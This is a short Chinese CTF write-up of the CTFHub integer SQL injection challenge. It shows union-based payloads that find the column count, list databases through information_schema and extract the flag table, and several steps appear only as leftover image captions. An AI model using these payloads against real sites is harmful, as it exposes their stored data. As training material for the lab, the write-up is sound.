天天看点

CTFHUB-SQL注入-整数型注入整数型注入

整数型注入

考点 SQL注入-整数型注入

分析过程

输入 1试试

CTFHUB-SQL注入-整数型注入整数型注入

得到回显结果如上

由于已知是整数型 所以直接判断列数

playload:

?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3
           
CTFHUB-SQL注入-整数型注入整数型注入
CTFHUB-SQL注入-整数型注入整数型注入

到3时无回显由此得出其有两列

然后查询库名

playload:

CTFHUB-SQL注入-整数型注入整数型注入

得到库名 此时可以爆出所有的数据库名

playload:

?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
           
CTFHUB-SQL注入-整数型注入整数型注入

根据库名爆表名

playload:

CTFHUB-SQL注入-整数型注入整数型注入

然后去爆flag的字段

playload:

CTFHUB-SQL注入-整数型注入整数型注入

爆出字段可以直接查询数据

playload:

?id=-1 union select 1,group_concat(flag) from sqli.flag
           
CTFHUB-SQL注入-整数型注入整数型注入

属于是得到flag